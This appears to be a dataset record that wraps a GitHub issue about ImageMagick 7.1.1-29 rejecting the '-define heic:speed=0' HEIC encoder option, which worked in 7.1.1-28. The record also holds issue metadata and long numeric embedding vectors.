0.011240012012422085, 0.0037974019069224596, 0.004729120060801506, 0.007093680091202259, -0.008782652206718922, 0.006325291004031897, 0.03323005139827728, -0.018530430272221565, 0.0048664649948477745, 0.006611117161810398, 0.001324265031144023, 0.015278696082532406, -0.029651658609509468, 0.012190290726721287, -0.0013298330595716834, 0.004094363655894995, 0.005215395707637072, 0.014209632761776447, 0.0032313179690390825, 0.0037194492761045694, -0.007906613871455193, -0.011440461501479149, 0.008604474365711212, 0.005100322887301445, 0.007357234135270119, 0.004940705839544535, 0.003459607483819127, -0.01805528998374939, 0.0035041519440710545, 0.006421803496778011, -0.0008509817998856306, 0.002576145576313138, -0.008166455663740635, 0.01190817728638649, -0.026013873517513275, 0.00075632514199242, 0.005404708907008171, -0.012776791118085384, -0.022895772010087967, -0.006488620303571224, -0.015783531591296196, -0.01801074668765068, -0.029844682663679123, 0.007899189367890358, 0.008374328725039959, -0.01020064577460289, -0.04026804864406586, 0.0027246265672147274, 0.0002603057655505836, 0.004372765775769949, 0.015798378735780716, 0.0024276645854115486, 0.010334278456866741, 0.013467228040099144, 0.0314185805618763, -0.0062436265870928764, 0.004409885965287685, 0.03643723949790001, -0.009302334859967232, 0.03504151850938797, -0.035932403057813644, -0.005913256201893091, -0.011923025362193584, -0.000005897915343666682, -0.009265215136110783, -0.005222819745540619, 0.0011915600625798106, -0.0009266143315471709, 0.004970401991158724, 0.01427644956856966, 0.011678031645715237, 0.00129920884501189, 0.012450132519006729, -0.01055699959397316, -0.000928934314288199, -0.004194588400423527, -0.007398066110908985, 0.0004236348904669285, -0.00267637032084167, -0.010594120249152184, 0.0013780894223600626, 0.007438898552209139, -0.028330177068710327, -0.012249683029949665, -0.007509427145123482, 0.023207582533359528, 0.011433037929236889, -0.010534727945923805, 0.004859040956944227, 0.0010477191535755992, 0.013853278011083603, 0.01141076534986496, -0.0017641399754211307, 0.0016527792904525995, -0.01345237996429205, 0.006889518816024065, 0.026340531185269356, -0.018278012052178383, -0.01936192438006401, -0.003082836978137493, 0.012531797401607037, -0.021574290469288826, -0.02751353196799755, 0.0042391326278448105, 0.011351373046636581, -0.0004788512596860528, 0.000327122223097831, 0.011195467785000801, 0.000502051436342299, 0.011009867303073406, -0.01734258234500885, -0.0014161376748234034, 0.003934746608138084, 0.00577962351962924, 0.02144065871834755, 0.008790075778961182, 0.01934707537293434, 0.015278696082532406, 0.00655914843082428, 0.024232100695371628, -0.008649018593132496, -0.010586695745587349, 0.010245190002024174, -0.002678226213902235, -0.009903683327138424, 0.0096958102658391, 0.02452906221151352, 0.003468887647613883, 0.010720329359173775, -0.0061248415149748325, -0.0051374430768191814, 0.008463417179882526, 0.013563740067183971, -0.0019024129724130034, -0.010846537537872791, -0.018857087939977646, 0.01836710050702095, 0.01172257587313652, 0.02656325325369835, 0.0010059588821604848, 0.05541311204433441, -0.00038721063174307346, 0.003721305401995778, 0.016125038266181946, -0.025301164016127586, -0.003765849629417062, -0.003327830694615841, -0.006848686374723911, -0.0074017783626914024, 0.005527205765247345, -0.006611117161810398, -0.002435088623315096, 0.006303018890321255, -0.0005530917551368475, -0.005813031457364559, -0.01308860071003437, -0.0014476898359134793, -0.010935625992715359, -0.00021471746731549501, -0.013296474702656269, -0.0020453259348869324, -0.0009679105714894831, 0.0045583671890199184, -0.01670411415398121, 0.010608968324959278, 0.011455309577286243, 0.004476702306419611, 0.006236202549189329, -0.00195809337310493, -0.03061678446829319, -0.002345999935641885, -0.007524275220930576, 0.012368468567728996, -0.0031496533192694187, 0.011603791266679764, 0.016585329547524452, -0.009621569886803627, 0.017788024619221687, 0.011685455217957497, -0.008359480649232864, -0.0062436265870928764, -0.006540588568896055, -0.02207912690937519, -0.006236202549189329, -0.00267637032084167, -0.005827879533171654, 0.004510110709816217, -0.0031607896089553833, -0.00904249306768179, 0.021247632801532745, -0.01936192438006401, 0.01765439286828041, -0.007617075927555561, 0.006618541199713945, 0.0001691291545284912, 0.021960342302918434, 0.012331347912549973, 0.0011822800152003765, -0.011069259606301785, 0.008210999891161919, -0.010289734229445457, 0.007624499965459108, 0.011633487418293953, 0.004242844879627228, -0.01909465715289116, 0.012175442650914192, -0.005400996655225754, 0.007212465163320303, -0.002353423973545432, 0.020861582830548286, 0.011819088831543922, -0.01327420212328434, 0.0012249683495610952, 0.0014551138738170266, -0.009770050644874573, -0.018857087939977646, 0.023266974836587906, -0.003927322570234537, -0.0028953796718269587, 0.003500439925119281, 0.013444955460727215, -0.010007619857788086, 0.019168898463249207, -0.0040312595665454865, -0.025226924568414688, -0.004747680388391018, -0.011663183569908142, -0.013875550590455532, -0.021871251985430717, -0.003327830694615841, -0.0008477337541989982, 0.031804632395505905, -0.004495262634009123, -0.010950474068522453, 0.0014736740849912167, 0.009124157950282097, -0.0018393085338175297, 0.005400996655225754, -0.012242259457707405, -0.0017483639530837536, 0.017891962081193924, -0.008144183084368706, -0.030468303710222244, -0.0009734785999171436, 0.008871740661561489, -0.016258670017123222, 0.002576145576313138, -0.01345980353653431, -0.02108430303633213, 0.00500752218067646, 0.03233916312456131, 0.000011607328815443907, -0.0017316597513854504, 0.013318746350705624, 0.0009799746330827475, 0.004008987452834845, -0.028374720364809036, 0.014009183272719383, 0.02148520201444626, 0.004640031605958939, -0.010727752931416035, 0.0062250662595033646, 0.04071349278092384, 0.001796620199456811, -0.004402461927384138, -0.012190290726721287, -0.007869493216276169, 0.017090164124965668, 0.007795252837240696, 0.014877797104418278, -0.0034948717802762985, 0.000013412591215455905, 0.01630321517586708, -0.020148873329162598, -0.012494676746428013, 0.031032530590891838, -0.0018151802942156792, 0.020876429975032806, 0.0033630949910730124, 0.014862949028611183, -0.013385563157498837, 0.04831572249531746, 0.00663338927552104, -0.013630556873977184, -0.03174524009227753, 0.014506594277918339, 0.001435625716112554, 0.021678227931261063, -0.011774543672800064, -0.010928202420473099, 0.015442024916410446, 0.00729784183204174, 0.02651870809495449, 0.012130898423492908, -0.015338088385760784, 0.004821920767426491, -0.0029102277476340532, 0.008233272470533848, 0.004190876614302397, -0.002873107558116317, 0.01074260100722313, -0.002657809993252158, 0.013920094817876816, 0.003183061722666025, 0.01548656914383173, 0.0077581326477229595, -0.017535606399178505, 0.03358640521764755, 0.014729316346347332, -0.009591872803866863, -0.001796620199456811, -0.014855525456368923, 0.007980854250490665, 0.00047374723362736404, 0.009569601155817509, 0.01599140465259552, 0.004844192881137133, -0.004124060273170471, -0.0029789002146571875, -0.003971866797655821, -0.0022439192980527878, -0.0003612264699768275, -0.04466308653354645, 0.022687898948788643, 0.0193916205316782, -0.01667441800236702, -0.013021784834563732, 0.0037472895346581936, -0.010727752931416035, 0.013392986729741096, 0.001201768172904849, 0.0015070822555571795, 0.012709974311292171, -0.006165673956274986, 0.0088420445099473, -0.005000098142772913, 0.00690436689183116, -0.004732832312583923, 0.006017192732542753, 0.004276253283023834, -0.015248999930918217, -0.026310835033655167, 0.018292861059308052, 0.024632999673485756 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.1-29 ### Operating system Linux ### Operating system, version and so on ubuntu 22.04 running in WSL2 ### Description When using the parameter "-define heic:speed=0" it throws this error: Unsupported encoder parameter (5.2005) `000.heic' @ error/heic.c/IsHEIFSuccess/142. Tried to use it as string, or using placebo string etc., but still same result. In 7.1.1-28 it was working fine. ### Steps to Reproduce Execute "magick convert -quality 20 -define heic:speed=0 000.jpg 000.heic" command ### Images _No response_
heic:speed parameter not working
https://api.github.com/repos/ImageMagick/ImageMagick/issues/7137/comments
9
2024-02-27T15:21:56
2024-03-23T21:58:21Z
https://github.com/ImageMagick/ImageMagick/issues/7137
2,156,877,582
7,137
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : heic:speed parameter not working Issue date: --- start body --- ### ImageMagick version 7.1.1-29 ### Operating system Linux ### Operating system, version and so on ubuntu 22.04 running in WSL2 ### Description When using the parameter "-define heic:speed=0" it throws this error: Unsupported encoder parameter (5.2005) `000.heic' @ error/heic.c/IsHEIFSuccess/142. Tried to use it as string, or using placebo string etc., but still same result. In 7.1.1-28 it was working fine. ### Steps to Reproduce Execute "magick convert -quality 20 -define heic:speed=0 000.jpg 000.heic" command ### Images _No response_ --- end body ---
710
[ -0.03310297802090645, 0.03459850698709488, -0.007359013427048922, 0.0418173149228096, 0.008175084367394447, 0.03281537815928459, 0.002654924988746643, 0.05444303900003433, -0.025150785222649574, 0.013970262371003628, 0.0357489176094532, 0.010756311006844044, 0.0067226942628622055, 0.012445972301065922, -0.015027198940515518, 0.029939357191324234, -0.031089765951037407, 0.022576749324798584, -0.02306567132472992, 0.003309219377115369, 0.021239399909973145, 0.0002482813142705709, -0.018047019839286804, 0.021900884807109833, -0.0039473362267017365, -0.00042039307300001383, -0.01777379773557186, 0.02673259563744068, -0.026502514258027077, -0.02673259563744068, 0.024834424257278442, 0.023568974807858467, -0.005004272796213627, 0.03842361271381378, 0.04644770547747612, -0.0026009995490312576, 0.03652543947100639, 0.06321489810943604, -0.048949841409921646, 0.008146324194967747, -0.01899610459804535, -0.03321801871061325, -0.012733574025332928, 0.036698002368211746, -0.03137736767530441, -0.013164976611733437, -0.02868828922510147, 0.01034647785127163, -0.02039097435772419, -0.006348812021315098, 0.02569722943007946, -0.028558868914842606, -0.028415067121386528, -0.016508348286151886, -0.00991507526487112, -0.04319780319929123, 0.036899324506521225, 0.02260550856590271, -0.01833462156355381, 0.012999605387449265, -0.0177594181150198, 0.0032373189460486174, -0.033706940710544586, 0.00524154445156455, -0.02306567132472992, -0.022418567910790443, 0.004091137088835239, 0.050071489065885544, -0.01719859428703785, -0.01335910800844431, -0.025251446291804314, -0.004465019330382347, 0.031952571123838425, 0.040753189474344254, 0.04104078933596611, -0.052659906446933746, 0.034742310643196106, 0.01751495525240898, -0.03068712167441845, 0.015372321009635925, -0.04385928809642792, 0.009699374437332153, -0.062294572591781616, -0.01297803595662117, 0.04365796968340874, -0.01359638012945652, -0.015573643147945404, -0.04414689168334007, -0.030859682708978653, 0.007851531729102135, -0.0017175226239487529, -0.004382333718240261, 0.017644375562667847, -0.016652150079607964, -0.015444221906363964, 0.02940729446709156, -0.010217057541012764, 0.031751248985528946, -0.04909364506602287, -0.06338746100664139, -0.011353084817528725, -0.018205199390649796, -0.0009454912506043911, 0.02671821601688862, -0.002018605824559927, 0.0004776887653861195, -0.029392914846539497, -0.04736803099513054, 0.005730467848479748, 0.08018340915441513, 0.0008780845673754811, -0.02729341946542263, 0.01899610459804535, 0.0034278552047908306, -0.01524290069937706, 0.020879898220300674, -0.0295654758810997, 0.013330347836017609, 0.02049163542687893, 0.027163999155163765, -0.01122366450726986, -0.010332098230719566, -0.005360180512070656, 0.04118459299206734, -0.015127860009670258, 0.0044829947873950005, -0.012683243490755558, -0.021081218495965004, 0.0029802746139466763, -0.05550716444849968, -0.003868245519697666, -0.0025237067602574825, 0.02625805325806141, -0.006880875211209059, -0.004648365546017885, -0.020362215116620064, -0.020218413323163986, 0.028415067121386528, -0.01797511801123619, -0.019326847046613693, -0.04138591140508652, -0.018162060528993607, 0.02595607191324234, -0.010253007523715496, -0.0257978904992342, 0.023094432428479195, -0.026387473568320274, -0.02873142994940281, 0.01745743490755558, 0.014509515836834908, -0.02204468473792076, -0.05953359231352806, -0.007456079125404358, -0.018766023218631744, 0.056053608655929565, 0.030715882778167725, -0.015774963423609734, -0.011726967059075832, 0.00043499786988832057, 0.005601047072559595, -0.0258554108440876, -0.013474148698151112, -0.015602403320372105, 0.024187318980693817, 0.0005999195855110884, 0.037618327885866165, -0.028343167155981064, 0.0166377704590559, -0.015343560837209225, 0.026761356741189957, 0.01823396049439907, -0.013812080956995487, 0.0019377177814021707, -0.03804973140358925, -0.037215687334537506, 0.006600463762879372, 0.0017372951842844486, -0.017644375562667847, 0.023151952773332596, -0.0321538932621479, -0.013991832733154297, 0.008707147091627121, 0.019499408081173897, -0.006618438754230738, 0.050848014652729034, -0.01801825873553753, -0.016436448320746422, -0.00017053894407581538, 0.02369839698076248, -0.0050546033307909966, 0.027825484052300453, 0.04535482078790665, -0.015055959112942219, -0.0165802501142025, 0.001373299048282206, 0.005101338494569063, 0.01475397776812315, -0.05438552051782608, -0.004101922269910574, -0.03626659885048866, 0.016292648389935493, 0.0178169384598732, -0.023195093497633934, -0.05320635065436363, -0.004616010468453169, 0.0116910170763731, 0.0004633086791727692, 0.033908262848854065, 0.019068006426095963, -0.011863578110933304, 0.022231627255678177, -0.04288144409656525, 0.03902757912874222, -0.004270888399332762, -0.009232020936906338, 0.019801391288638115, 0.009332682006061077, 0.02198716439306736, -0.045699942857027054, 0.03016943857073784, -0.00564059242606163, -0.02625805325806141, 0.005949764046818018, -0.011245233938097954, -0.04066690802574158, -0.02781110443174839, -0.0005716087762266397, -0.02182898484170437, -0.00980722438544035, 0.023497074842453003, 0.0016033805441111326, -0.025323346257209778, 0.016393307596445084, 0.02198716439306736, -0.01348852925002575, -0.0023151952773332596, -0.006377572193741798, -0.04020674526691437, -0.007247567642480135, -0.011288374662399292, 0.012546632438898087, 0.049467526376247406, -0.0005064489669166505, -0.034109584987163544, -0.014042162336409092, 0.027839863672852516, -0.003535705851390958, -0.013215307146310806, -0.010368048213422298, -0.0008992053335532546, -0.004234937950968742, -0.008994749747216702, -0.002917361678555608, 0.005694517400115728, -0.01174134761095047, 0.026042351499199867, 0.019226185977458954, -0.01839214190840721, 0.022432947531342506, -0.024287980049848557, 0.02152700163424015, 0.02934977412223816, -0.00993664562702179, -0.0006974345888011158, 0.025826649740338326, -0.004490184597671032, -0.016292648389935493, -0.001056038192473352, 0.014969678595662117, -0.02625805325806141, 0.024575581774115562, 0.00668314890936017, -0.0220878254622221, 0.0036992793902754784, -0.018190819770097733, -0.006895255297422409, -0.04135715216398239, -0.020793616771697998, 0.034425947815179825, -0.024345500394701958, -0.030457040295004845, 0.03402330353856087, 0.011309945024549961, 0.04219119995832443, 0.009088220074772835, -0.0104255685582757, -0.003551883390173316, -0.05757790058851242, -0.026603175327181816, -0.034368425607681274, -0.018190819770097733, 0.03758956864476204, -0.026502514258027077, 0.03166496753692627, -0.003979691304266453, -0.0021642043720930815, -0.007980952970683575, -0.0104543287307024, -0.004763406235724688, 0.008548966608941555, -0.012374071404337883, 0.005133694037795067, 0.05556468665599823, -0.008743098005652428, -0.03641039878129959, 0.0017687516519799829, -0.0004127536667510867, 0.014070922508835793, -0.014301004819571972, -0.028026804327964783, 0.02589855156838894, 0.025927310809493065, 0.01001573633402586, 0.0037567997351288795, -0.003625581506639719, 0.00004743746103486046, -0.01061251014471054, -0.020664196461439133, -0.016609009355306625, 0.0023421579971909523, -0.012920515611767769, 0.009232020936906338, -0.032470256090164185, -0.007585499901324511, 0.004950347822159529, -0.010166727006435394, -0.04239251837134361, -0.001172876451164484, -0.0321538932621479, -0.00502224825322628, -0.02204468473792076, -0.04917992278933525, -0.016407689079642296, 0.035605113953351974, 0.010188297368586063, -0.05156702175736427, -0.02095179818570614, -0.01225184090435505, -0.005608236882835627, 0.020520394667983055, -0.015990665182471275, -0.008635247126221657, 0.01281985454261303, -0.008074423298239708, 0.04469333589076996, -0.02611425146460533, -0.003609403735026717, 0.009066649712622166, 0.031291086226701736, -0.017903218045830727, 0.000853818142786622, 0.05081925541162491, 0.010332098230719566, 0.029105311259627342, -0.011345895007252693, -0.0528324693441391, -0.016292648389935493, -0.007750871125608683, -0.000027580572350416332, -0.04756935313344002, 0.017960738390684128, -0.05582352727651596, 0.022677410393953323, -0.02739408053457737, 0.0017705492209643126, -0.0013535264879465103, 0.003242711303755641, -0.03385074436664581, -0.04572870209813118, -0.052544865757226944, -0.0006008183117955923, 0.011518456041812897, -0.03701436519622803, 0.05165329948067665, -0.019556928426027298, -0.026919538155198097, 0.00674785953015089, -0.019068006426095963, -0.011029533110558987, 0.027264660224318504, -0.03554759547114372, 0.03848113492131233, 0.052401065826416016, -0.029421674087643623, 0.029392914846539497, -0.013804891146719456, -0.007585499901324511, -0.0431690439581871, 0.015487362630665302, -0.05102057754993439, -0.01616322621703148, -0.029651755467057228, -0.05127941817045212, -0.06413522362709045, -0.025625329464673996, 0.06367506086826324, -0.002771763363853097, -0.03635288029909134, 0.018722884356975555, 0.0011513063218444586, -0.0026405449025332928, -0.020218413323163986, 0.03367818146944046, -0.011266804300248623, 0.0004992589238099754, 0.04779943451285362, -0.045182257890701294, -0.03074464201927185, 0.0005181328160688281, 0.00308273290283978, 0.0075495499186217785, 0.013689850457012653, -0.0018199807964265347, -0.014020592905580997, -0.003810725174844265, 0.029594235122203827, -0.014638936147093773, -0.0022576749324798584, -0.02400037832558155, 0.0046447706408798695, -0.0054896012879908085, -0.010562179610133171, -0.01122366450726986, 0.02286435104906559, 0.036180317401885986, 0.011547216214239597, -0.0009526812937110662, 0.0033200043253600597, 0.04221995919942856, 0.0104543287307024, -0.028817709535360336, -0.02605673111975193, 0.0050186533480882645, -0.00002974320341309067, -0.008707147091627121, 0.008965989574790001, 0.002906576730310917, 0.028975890949368477, -0.009526812471449375, -0.006564513314515352, -0.017543716356158257, 0.010166727006435394, -0.008203844539821148, 0.014969678595662117, -0.00038736380520276725, 0.002611784730106592, -0.01786007732152939, 0.018464041873812675, -0.02410103939473629, -0.00708219688385725, -0.01576058380305767, 0.034282147884368896, 0.011216473765671253, -0.05303379148244858, 0.032671574503183365, 0.00010206497245235369, -0.016666529700160027, 0.0018999699968844652, 0.008232604712247849, -0.015228520147502422, 0.0017651566304266453, 0.0044829947873950005, 0.013423818163573742, -0.03738824650645256, 0.02306567132472992, -0.017644375562667847, -0.013804891146719456, -0.002870626514777541, 0.017328014597296715, 0.005536336451768875, 0.01632140763103962, -0.0010659245308488607, 0.028903990983963013, 0.013172167353332043, 0.013021175749599934, 0.029004652053117752, -0.009620283730328083, -0.004393118899315596, 0.015530502423644066, -0.020937418565154076, 0.019801391288638115, -0.0480007566511631, 0.00826855469495058, -0.0014649721560999751, 0.022231627255678177, -0.010677220299839973, 0.019945191219449043, -0.04196111857891083, -0.04095451161265373, 0.04604506492614746, -0.0196719691157341, 0.029177213087677956, -0.026646316051483154, 0.004849687218666077, 0.004878447391092777, 0.019643209874629974, 0.0020491634495556355, -0.008944419212639332, 0.04561366140842438, -0.007808391470462084, 0.005593856796622276, 0.00671909935772419, 0.023669635877013206, -0.025783510878682137, -0.0027340154629200697, -0.025308966636657715, -0.038998816162347794, 0.000025151122827082872, -0.030629601329565048, 0.004925182554870844, 0.02178584411740303, -0.02364087663590908, -0.041644755750894547, -0.033189259469509125, 0.00983598455786705, 0.016148846596479416, 0.04526853933930397, -0.024417400360107422, 0.02039097435772419, 0.04288144409656525, -0.012036139145493507, -0.004533324856311083, 0.0032552939373999834, 0.03758956864476204, 0.02292187139391899, -0.000628230394795537, -0.001122546149417758, 0.005191214382648468, -0.03270033746957779, -0.014854637905955315, -0.004145062528550625, -0.007470459211617708, -0.0021300516091287136, 0.008074423298239708, -0.020175272598862648, 0.013193736784160137, -0.044578295201063156, 0.011856388300657272, -0.01627826690673828, -0.00936863198876381, -0.013661090284585953, 0.044261932373046875, -0.021354440599679947, -0.03137736767530441, -0.015588022768497467, -0.00872871745377779, -0.040235504508018494, 0.017083553597331047, -0.01128118485212326, -0.0077580614015460014, 0.011317134834825993, -0.0035464907996356487, 0.02106683887541294, 0.01349571906030178, -0.0029838697519153357, 0.02599921077489853, 0.01356761995702982, 0.005708897486329079, 0.019528169184923172, 0.006661579012870789, -0.022476088255643845, 0.02116749994456768, 0.001615963177755475, 0.015947524458169937, 0.006622033659368753, 0.002254079794511199, 0.02204468473792076, -0.004299648571759462, -0.04506721720099449, -0.023338893428444862, 0.0042097726836800575, -0.008944419212639332, -0.008376405574381351, -0.017054792493581772, -0.01058374997228384, -0.004655555821955204, 0.020103372633457184, -0.013402248732745647, -0.007614260073751211, 0.0048928274773061275, 0.017745036631822586, 0.000297263526590541, 0.001734598889015615, 0.013740180991590023, 0.031233565881848335, 0.00047139747766777873, -0.019643209874629974, -0.028386307880282402, -0.009332682006061077, -0.013280017301440239, -0.0045009697787463665, 0.029033411294221878, -0.014797117561101913, 0.021771464496850967, 0.027077719569206238, 0.0048892321065068245, -0.01739991456270218, 0.021771464496850967, 0.005205594468861818, 0.024834424257278442, -0.003632771549746394, 0.03770460933446884, -0.013481338508427143, -0.00885813869535923, -0.016436448320746422, 0.021052459254860878, -0.002295422600582242, -0.01947064884006977, 0.006381167098879814, 0.012625723145902157, 0.027667302638292313, 0.02745160087943077, 0.00988631509244442, -0.005439270753413439, 0.026128632947802544, 0.026531275361776352, -0.009289541281759739, -0.007297898177057505, -0.0246187224984169, -0.017831318080425262, 0.02415855973958969, -0.02899027056992054, 0.002699862699955702, 0.03126232698559761, -0.0016393307596445084, -0.0076286401599645615, -0.015588022768497467, 0.0035141357220709324, -0.0003460210282355547, -0.020793616771697998, 0.01107267290353775, -0.0009248198475688696, -0.005755633115768433, 0.007441699039191008, -0.0019485028460621834, 0.011870767921209335, 0.008448305539786816, 0.005270304623991251, -0.004163037519901991, -0.012072090059518814, -0.01683909073472023, -0.02878895029425621, -0.0042565083131194115, 0.0076502105221152306, -0.01348852925002575, -0.010842591524124146, -0.0006237365887500346, 0.03738824650645256, -0.00350155308842659, 0.0005059996037743986, -0.009095409885048866, -0.0032930418383330107, 0.02940729446709156, 0.03954526036977768, 0.024935085326433182, 0.00034040381433442235, 0.03160744905471802, 0.04213367775082588, -0.016407689079642296, -0.016609009355306625, -0.013610759750008583, 0.0233245138078928, 0.0013768940698355436, 0.010058876127004623, 0.008915659040212631, 0.03595023602247238, 0.0076286401599645615, -0.02667507529258728, 0.01811891980469227, 0.03477106988430023, -0.01063408050686121, -0.032412733882665634, 0.04043682664632797, -0.014336954802274704, 0.007376988884061575, -0.011590356938540936, 0.01811891980469227, 0.01601942628622055, -0.005543526727706194, 0.044664572924375534, 0.018650982528924942, -0.005108528770506382, -0.007186452392488718, 0.016508348286151886, -0.023151952773332596, -0.019787009805440903, 0.004921587649732828, -0.010353668592870235, 0.04155847430229187, -0.06517059355974197, 0.011957048438489437, -0.013675469905138016, -0.010928872041404247, -0.018104540184140205, 0.005870673805475235, 0.012805474922060966, 0.019858911633491516, 0.0029389318078756332, -0.00437514390796423, -0.016910990700125694, -0.01987329125404358, 0.028386307880282402, 0.0044829947873950005, 0.01962883025407791, -0.013344728387892246, 0.004540515132248402, 0.014430425129830837, -0.019427508115768433, -0.029364153742790222, 0.0032121536787599325, -0.0034386401530355215, 0.025251446291804314, 0.011180523782968521, 0.02435988001525402, 0.00612951535731554, 0.010950442403554916, -0.024532441049814224, 0.00022805931803304702, -0.023051291704177856, 0.018032638356089592, 0.0031654182821512222, -0.004605225287377834, -0.03897005692124367, -0.03876873478293419, 0.03301669657230377, 0.006356001831591129, 0.0321538932621479, 0.017428675666451454, 0.0015791141195222735, 0.018248340114951134, -0.02358335629105568, -0.022993771359324455, 0.014768357388675213, 0.013689850457012653, 0.023885337635874748, -0.0013085886603221297, 0.00988631509244442, -0.0025938095059245825, 0.037618327885866165, 0.0129277054220438, -0.012402831576764584, -0.0043535735458135605, 0.012539442628622055, -0.013409438543021679, -0.02894713170826435, -0.020060231909155846, 0.007215212564915419, 0.02044849470257759, -0.050646692514419556, 0.0011800664942711592, 0.013797701336443424, 0.006970751099288464, 0.02589855156838894, -0.04115583002567291, -0.0295654758810997, 0.012424401938915253, 0.026401855051517487, -0.02306567132472992, 0.001657305983826518, -0.025208305567502975, -0.0033811198081821203, 0.005122908856719732, 0.0006502498872578144, 0.005234354641288519, 0.03646792098879814, 0.02182898484170437, 0.037762127816677094, -0.00005903702913201414, 0.01616322621703148, -0.0141068734228611, 0.0012079279404133558, 0.027796722948551178, -0.020635435357689857, -0.015717443078756332, -0.004450639244168997, -0.026660695672035217, -0.025567809119820595, 0.008383595384657383, 0.02982431650161743, 0.008951609022915363, -0.02018965408205986, 0.015976285561919212, -0.041270870715379715, 0.06436530500650406, -0.016652150079607964, -0.012676053680479527, -0.0006875483086332679, 0.000054009615269023925, -0.02168518304824829, -0.0069312057457864285, 0.013107456266880035, 0.0020042257383465767, 0.05217098444700241, -0.015156620182096958, -0.0013939704513177276, -0.006517778150737286, -0.02451806142926216, 0.022274766117334366, 0.029263492673635483, -0.00875747762620449, -0.022907491773366928, 0.03353438153862953, -0.001013796660117805, -0.022993771359324455, -0.05191214382648468, -0.031636208295822144, -0.03154992684721947, 0.006823354866355658, -0.02034783363342285, 0.027207139879465103, 0.019226185977458954, 0.010497469455003738, 0.026790115982294083, 0.00405518664047122, -0.0018748048460111022, 0.008584916591644287, 0.004285268485546112, -0.016551489010453224, -0.006018069572746754, 0.03511619195342064, -0.049208685755729675, 0.0020905062556266785, -0.003972501028329134, -0.018909825012087822, -0.04339912533760071, 0.018938584253191948, -0.01053341943770647, 0.01570306345820427, -0.015458602458238602, -0.006151085719466209, 0.030917204916477203, -0.02609987184405327, -0.03347685933113098, 0.005442866124212742, -0.022102205082774162, 0.02822812646627426, -0.005903028883039951, 0.012640103697776794, -0.04607382416725159, 0.009361442178487778, 0.006834140047430992, 0.0077580614015460014, -0.026746977120637894, 0.00937582179903984, 0.004770596511662006, -0.0013382475590333343, -0.03140612691640854, -0.01403497252613306, -0.023597735911607742, -0.011065483093261719, 0.015933144837617874, 0.014459185302257538, 0.00944772269576788, 0.027408460155129433, 0.011180523782968521, 0.003961716312915087, -0.03718692436814308, -0.010238627903163433, -0.003986881114542484, -0.03850989416241646, -0.007923432625830173, 0.014315384440124035, -0.008771858178079128, -0.02306567132472992, 0.016465209424495697, -0.03425338491797447, 0.0058814589865505695, -0.005608236882835627, 0.014581415802240372, 0.010181107558310032, -0.030917204916477203, -0.009354251436889172, 0.037675850093364716, -0.0025093266740441322, -0.02162766270339489, -0.004030021373182535, -0.011367465369403362, -0.018679743632674217, -0.00017784132796805352, 0.02528020739555359, 0.00438952399417758, 0.00988631509244442, -0.0035303132608532906, 0.01606256514787674, 0.023914096876978874, -0.006064805202186108, 0.0015108087100088596, -0.024144180119037628, 0.002388893160969019, -0.0040479968301951885, 0.016609009355306625, 0.011842007748782635, -0.024129798635840416, -0.018291480839252472, 0.000552734883967787, 0.010856972075998783, -0.0012942085741087794, -0.010288957506418228, 0.00936863198876381, -0.02389971725642681, 0.005072578322142363, -0.025150785222649574, 0.010432759299874306, 0.008685577660799026, -0.010799450799822807, -0.02589855156838894, -0.015401081182062626, 0.0044542346149683, 0.020736096426844597, 0.006298481486737728, 0.010209867730736732, -0.024072278290987015, 0.02280683070421219, -0.01616322621703148, 0.005698112770915031, -0.005787988193333149, -0.01879478432238102, 0.006356001831591129, 0.004252912942320108, 0.0455273799598217, -0.034627269953489304, 0.0015117074362933636, 0.00942615233361721, 0.010166727006435394, -0.01171258743852377, -0.02760978229343891, -0.02080799639225006, -0.0009445924661122262, 0.007837152108550072, -0.014538276009261608, 0.023108812049031258, -0.011784487403929234, 0.03954526036977768, -0.007197237573564053, -0.019686350598931313, -0.0368705615401268, 0.005870673805475235, 0.00993664562702179, -0.02168518304824829, -0.03779089078307152, 0.01341662835329771, -0.0034961604978889227, 0.0033901073038578033, -0.03629535809159279, -0.0021713944151997566, -0.004813736770302057, -0.0036561391316354275, 0.0009841377614066005, -0.014265053905546665, -0.02440302073955536, -0.01607694663107395, 0.008613676764070988, 0.02316633239388466, -0.004526135046035051, 0.02733656018972397, -0.013078696094453335, -0.013049935922026634, -0.011468125507235527, -0.010885732248425484, 0.00460882019251585, -0.014897778630256653, -0.0067694298923015594, -0.029910597950220108, 0.006140300538390875, -0.02110997959971428, -0.002212736988440156, -0.01689661107957363, 0.015429841354489326, -0.008441115729510784, -0.01230936124920845, 0.011475315317511559, -0.007700540591031313, 0.0037567997351288795, -0.004702290985733271, -0.011209283955395222, 0.01817644014954567, -0.012244651094079018, -0.0004956639022566378, 0.0037496096920222044, -0.00033793222974054515, -0.010382428765296936, -0.0430540032684803, 0.03537503257393837, 0.022015925496816635, 0.06896693259477615, -0.02883209101855755, 0.0018442472210153937, 0.00821103435009718, -0.02909093163907528, 0.0343971885740757, 0.03485735133290291, -0.002203749492764473, 0.0029011841397732496, -0.0417022742331028, 0.045814983546733856, 0.011432175524532795, 0.008743098005652428, 0.005396130494773388, 0.024331120774149895, -0.012791094370186329, -0.006575298495590687, 0.022648649290204048, -0.025869790464639664, -0.029910597950220108, -0.0022145346738398075, 0.028717050328850746, 0.010353668592870235, 0.022979391738772392, -0.0022900300100445747, 0.021124359220266342, 0.00047454313607886434, 0.012632912956178188, 0.02868828922510147, -0.024633102118968964, 0.004749026149511337, 0.04546986147761345, 0.008038473315536976, -0.03419586643576622, -0.009907885454595089, 0.03154992684721947, -0.005417700856924057, -0.023497074842453003, -0.010368048213422298, -0.03577767685055733, 0.001633938285522163, 0.004817331675440073, -0.01387679111212492, -0.01356761995702982, 0.010835401713848114, 0.021483860909938812, -0.015789344906806946, 0.012424401938915253, 0.017802556976675987, -0.022361047565937042, -0.0178169384598732, -0.023799056187272072, 0.018909825012087822, -0.016407689079642296, -0.02543838694691658, 0.0025255042128264904, 0.030888443812727928, 0.0056513771414756775, -0.004637580830603838, -0.024762524291872978, 0.01576058380305767, 0.01807577908039093, 0.02883209101855755, -0.005237949546426535, -0.0010686208261176944, -0.025625329464673996, 0.007064221426844597, -0.007815581746399403, 0.03572015464305878, -0.0246187224984169, -0.0019988331478089094, -0.019298087805509567, -0.00639914209023118, -0.02970927581191063, 0.009778464213013649, -0.005219974555075169, 0.010080446489155293, -0.009045079350471497, -0.007894672453403473, -0.013200927525758743, -0.012517872266471386, 0.0025183141697198153, -0.017989499494433403, 0.023770296946167946, -0.03681304305791855, 